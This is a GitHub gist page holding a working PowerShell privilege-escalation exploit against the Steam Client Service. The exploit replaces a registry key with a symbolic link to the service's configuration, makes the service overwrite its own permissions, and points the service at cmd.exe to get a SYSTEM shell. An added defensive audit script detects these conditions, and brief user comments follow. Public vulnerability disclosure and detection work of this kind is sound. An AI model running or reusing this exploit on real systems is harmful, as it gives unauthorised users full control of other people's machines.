@enigma0x3
Created August 7, 2019 08:16
# NtObjectManager (James Forshaw) exposes the native NtKey API needed to create a registry symbolic link;
# the PowerShell registry provider cannot create one.
Write-Host "[*] Installing NTObjectManager..."
install-module NTObjectManager -Scope CurrentUser -Force
import-module NTObjectManager
# Every key under HKLM\SOFTWARE\WOW6432Node\Valve\Steam grants Users full control, so a standard user
# can delete this subkey and recreate it as a link.
Write-Host "[*] Removing HKLM:\SOFTWARE\WOW6432Node\Valve\Steam\NSIS"
Remove-Item -Path "HKLM:\SOFTWARE\WOW6432Node\Valve\Steam\NSIS"
# The link points the user-writable NSIS key at the service's own configuration key under SYSTEM.
Write-Host "[*] Creating Registry Symbolic Link from HKLM:\SOFTWARE\WOW6432Node\Valve\Steam\NSIS to HKLM:\SYSTEM\CurrentControlSet\Services\Steam Client Service"
[NtApiDotNet.NtKey]::CreateSymbolicLink("\Registry\Machine\SOFTWARE\WOW6432Node\Valve\Steam\NSIS",$null, "\REGISTRY\Machine\SYSTEM\CurrentControlSet\Services\Steam Client Service")
# Standard users are allowed to start and stop this service. On start it rewrites the DACL of the Steam
# key tree to grant Users full control; following the link, it applies that DACL to its own service key.
Write-Host "[*] Registry Symbolic link created, restarting the Steam Client Service"
Get-Service "Steam Client Service" | Restart-Service
Write-Host "[*] Sleeping 5 seconds"
Start-Sleep 5
Write-Host "[*] DACL on HKLM:\SYSTEM\CurrentControlSet\Services\Steam Client Service should be overwritten"
# ImagePath is the registry value behind the service's binPath; with the permissive DACL it is now writable.
Write-Host "[*] Modifying the binPath on the Steam Client Service..."
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Steam Client Service" -Name "ImagePath" -Value "C:\Windows\System32\cmd.exe /c cmd.exe"
# The SCM launches the new ImagePath as LocalSystem in session 0. The restart reports an error because
# cmd.exe never reports a service status back to the SCM, but the process has already been spawned.
Write-Host "[*] binPath overwritten, restarting the service to trigger EoP. This will error out, just ignore it"
Get-Service "Steam Client Service" | Restart-Service
Write-Host "[*] Done, cmd.exe should now be running as NT AUTHORITY\SYSTEM"
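As an added example (not part of enigma0x3's gist, nor Valve's code), the following PowerShell audits a host for the three conditions the script above relies on or leaves behind: a low-privilege principal with write rights on the Steam key tree, a registry symbolic link anywhere under that tree, and a service ImagePath that no longer points at Steam's own binary. The function names and the RegLink helper are hypothetical; the check for `steamservice.exe` assumes that is the legitimate service binary. It needs no third-party module: a normal open silently follows a registry link, so the helper opens each key with REG_OPTION_OPEN_LINK and reads its SymbolicLinkValue, which only exists on the link key itself.

```powershell
# Added audit script; assumed helper and function names, not from the original gist.
$code = @'
using System;
using System.Runtime.InteropServices;
using System.Text;
public static class RegLink {
    [DllImport("advapi32.dll", CharSet = CharSet.Unicode)]
    static extern int RegOpenKeyExW(IntPtr hKey, string lpSubKey, uint ulOptions, uint samDesired, out IntPtr phkResult);
    [DllImport("advapi32.dll", CharSet = CharSet.Unicode)]
    static extern int RegQueryValueExW(IntPtr hKey, string lpValueName, IntPtr lpReserved, out uint lpType, byte[] lpData, ref uint lpcbData);
    [DllImport("advapi32.dll")]
    static extern int RegCloseKey(IntPtr hKey);
    const uint REG_OPTION_OPEN_LINK = 0x8;   // open the link key itself instead of following it
    const uint KEY_QUERY_VALUE = 0x1;
    static readonly IntPtr HKEY_LOCAL_MACHINE = new IntPtr(unchecked((int)0x80000002));
    // Returns the link target for an HKLM subkey that is a registry symbolic link, otherwise null.
    public static string GetLinkTarget(string subKey) {
        IntPtr h;
        if (RegOpenKeyExW(HKEY_LOCAL_MACHINE, subKey, REG_OPTION_OPEN_LINK, KEY_QUERY_VALUE, out h) != 0) return null;
        try {
            uint type, size = 0;
            // First call sizes the buffer; a non-link key has no SymbolicLinkValue and fails here.
            if (RegQueryValueExW(h, "SymbolicLinkValue", IntPtr.Zero, out type, null, ref size) != 0 || size == 0) return null;
            byte[] buf = new byte[size];
            if (RegQueryValueExW(h, "SymbolicLinkValue", IntPtr.Zero, out type, buf, ref size) != 0) return null;
            return Encoding.Unicode.GetString(buf, 0, (int)size);   // REG_LINK data is UTF-16, not NUL-terminated
        } finally { RegCloseKey(h); }
    }
}
'@
if (-not ('RegLink' -as [type])) { Add-Type -TypeDefinition $code }

# 1. Precondition: can a low-privilege principal modify the Steam key tree?
function Get-WeakSteamAces {
    param([string]$Path = 'HKLM:\SOFTWARE\WOW6432Node\Valve\Steam')
    $lowPriv = 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users', 'Everyone', 'NT AUTHORITY\INTERACTIVE'
    # Any of these rights lets a user delete/recreate subkeys, create links or rewrite the DACL.
    $writeRights = [System.Security.AccessControl.RegistryRights]'CreateSubKey, SetValue, Delete, ChangePermissions, CreateLink'
    (Get-Acl -Path $Path).Access | Where-Object {
        $_.AccessControlType -eq 'Allow' -and
        $lowPriv -contains $_.IdentityReference.Value -and
        ($_.RegistryRights -band $writeRights) -ne 0
    }
}

# 2. Artefact: is any key under the Steam tree a registry symbolic link, and where does it point?
function Get-SteamRegistryLinks {
    param([string]$SubKey = 'SOFTWARE\WOW6432Node\Valve\Steam')
    $keys = @(Get-Item "HKLM:\$SubKey" -ErrorAction SilentlyContinue) +
            @(Get-ChildItem "HKLM:\$SubKey" -Recurse -ErrorAction SilentlyContinue)
    foreach ($k in $keys) {
        $rel = $k.Name -replace '^HKEY_LOCAL_MACHINE\\', ''
        $target = [RegLink]::GetLinkTarget($rel)
        if ($target) { [pscustomobject]@{ Key = $k.Name; Target = $target } }
    }
}

# 3. Artefact: has the service's ImagePath been redirected away from Steam's binary?
function Test-SteamServiceImagePath {
    $svc = Get-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Services\Steam Client Service' -ErrorAction SilentlyContinue
    if (-not $svc) { return $null }
    [pscustomobject]@{
        ImagePath  = $svc.ImagePath
        # Assumption: the legitimate service binary is steamservice.exe.
        Suspicious = -not ($svc.ImagePath -match 'steamservice\.exe')
    }
}

Get-WeakSteamAces | Format-Table IdentityReference, RegistryRights -AutoSize
Get-SteamRegistryLinks | Format-Table -AutoSize
Test-SteamServiceImagePath
```

The ACL check runs as a standard user; the link and ImagePath checks only need read access to HKLM. An empty result from `Get-SteamRegistryLinks` on a patched host is expected, since the whole point of the link is that `Get-ChildItem` and `Get-Item` see the target, not the link.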
@mrcbax
mrcbax commented Aug 9, 2019

Well done. It's amazing how the simplest things get overlooked. To find such an issue in the steam client of all things is impressive. Their dedication to security means this will be patched almost immediately.

@malefficient
> Well done. It's amazing how the simplest things get overlooked. To find such an issue in the steam client of all things is impressive. Their dedication to security means this will be patched almost immediately.

😂😂😂
https://amonitoring.ru/article/steamclient-0day/
